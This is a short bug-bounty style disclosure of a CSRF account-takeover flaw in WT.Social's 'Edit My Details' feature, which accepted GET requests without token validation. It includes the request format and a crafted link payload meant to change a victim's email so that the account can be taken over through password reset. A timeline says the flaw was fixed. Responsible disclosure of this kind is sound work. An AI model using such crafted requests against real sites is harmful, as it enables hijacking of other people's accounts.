Account Take Over in Wt.Social


WT:Social, also known as WikiTribune Social, is an American micro-blogging and social networking service on which users contribute to “subwikis.” It was founded in October 2019 by Wikipedia co-founder Jimmy Wales as an alternative to Facebook and Twitter.The service contains no advertisements, and runs off of donations. As of mid-November 2019, it claimed over 200,000 users, for more details see

The finding

Upon inspecting the account editing feature ‘Edit My Details,’ I observed a noteworthy vulnerability in their implementation. To my surprise, the system employed a ‘GET’ request for this operation, exposing critical user information in the URL.

The request appeared as follows:

GET /myaccount/updatedetails?data={"_token":"USER_CSRF_TOKEN","action":"update","userInfo":{"fname":"Sarmad","lname":"Hassan","email":"","dob":"1921-01-01","dob_day":1,"dob_month":1,"dob_year":1921,"pw":"","pwc":"","pwo":""}}

I tried to delete my CSRF token just to check whether they validate it or not, and guess what it worked for me 🙂

Reproduction Steps

Step 1: Simply share the following link with other users:{“action”:”update”,”userInfo”:{“fname”:”Pwned”,”lname”:”ByJuba”,”email”:””,”dob”:”1921-01-01″,”dob_day”:1,”dob_month”:1,”dob_year”:1921,”pw”:””,”pwc”:””,”pwo”:””}}

Upon the recipient clicking on the provided link, their email will be altered, potentially allowing an attacker to gain control of the account by using the password reset option.”


  • I successfully bypassed their CSRF protection by removing the token from the ‘GET’ Request.
  • An attacker doesn’t have to create a CSRF form; they only need to transmit the same URL from a site trusted by others.

Special Thanks

I extend my gratitude to co-founder Jimmy Wales for granting me permission to disclose this security vulnerability


Sarmad | 17 Nov 2019

Initial Report

WT.Social | 19 Nov 2019

Report Triaged

WT.Social | 20 Nov 2019

Fixed By WT

Sarmad | 25 Nov 2019

Fix Confirmed